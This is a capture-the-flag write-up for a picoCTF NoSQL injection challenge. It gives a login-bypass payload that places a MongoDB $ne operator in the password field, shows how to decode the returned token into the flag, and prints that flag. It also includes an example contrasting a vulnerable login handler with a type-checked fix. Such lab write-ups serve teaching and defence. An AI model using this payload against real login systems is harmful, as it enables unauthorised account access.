No Sql Injection

Published: April 3, 2024 | Updated: December 9, 2025

Description

Can you try to get access to this website to get the flag? You can download the source here. The website is running here. Can you log in?

Web proxy

Download the challenge source to study app/utils/seed.ts and app/utils/database.ts.

Open the target site (linked in the challenge) and monitor the /api/login request in the DevTools Network tab.

Email: joshiriya355@mumbama.com
Password JSON: {"$ne":"null"}

Solution

  1. Step 1: Submit crafted JSON
    Use the email from seed.ts and place {"$ne":"null"} as the password value. MongoDB treats the object as a query operator, "password not equal to the string "null"", so the filter matches the stored password and the check passes.
    {"email":"joshiriya355@mumbama.com","password":{"$ne":"null"}}
  2. Step 2: Grab the token
    Inspect the /api/login response. It returns a JSON array with a base64-encoded token field.
  3. Step 3: Decode the flag
    Base64-decode the token (CyberChef or base64 -d) to recover the picoCTF flag.
    echo cGljb0NURntqQBh...== | base64 -d

Flag

picoCTF{jBhD2y7XoNzPv_1YxS9Ew5qL0uI6pasql_injection_f2f1...}

Decoding the token from /api/login yields the flag.
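Why the request in Step 1 passes, and the check that stops it, as an added example in plain JavaScript (not the challenge's own code). The in-memory `users` array, the `matches`/`findOne` helpers and the stored password are constructed stand-ins for the MongoDB collection and its filter matching.

```javascript
// Added example, not the challenge source. In-memory stand-in for the users
// collection: the email is the seeded one from the page, the password is constructed.
const users = [{ email: "joshiriya355@mumbama.com", password: "constructed-secret" }];

// Minimal emulation of MongoDB filter matching: plain equality and $ne only.
function matches(doc, filter) {
  return Object.entries(filter).every(([field, cond]) => {
    if (cond !== null && typeof cond === "object") {
      // Operator document such as {"$ne": "null"}
      return Object.entries(cond).every(([op, arg]) => {
        if (op === "$ne") return doc[field] !== arg;
        throw new Error("unsupported operator " + op);
      });
    }
    return doc[field] === cond; // scalar value: exact match
  });
}

function findOne(filter) {
  return users.find((u) => matches(u, filter)) || null;
}

// Vulnerable: values from the parsed JSON body go straight into the filter,
// so an object in place of the password is evaluated as an operator.
function loginVulnerable(body) {
  const { email, password } = JSON.parse(body);
  return findOne({ email, password }) !== null;
}

// Hardened: both fields must be strings, so an operator object is rejected
// before it ever reaches the query.
function loginHardened(body) {
  let parsed;
  try { parsed = JSON.parse(body); } catch { return false; }
  if (parsed === null || typeof parsed !== "object") return false;
  const { email, password } = parsed;
  if (typeof email !== "string" || typeof password !== "string") return false;
  return findOne({ email, password }) !== null;
}
```

The type check is the fix for this bug. Separately, a production login would store a password hash and compare it in application code rather than matching the password inside the query.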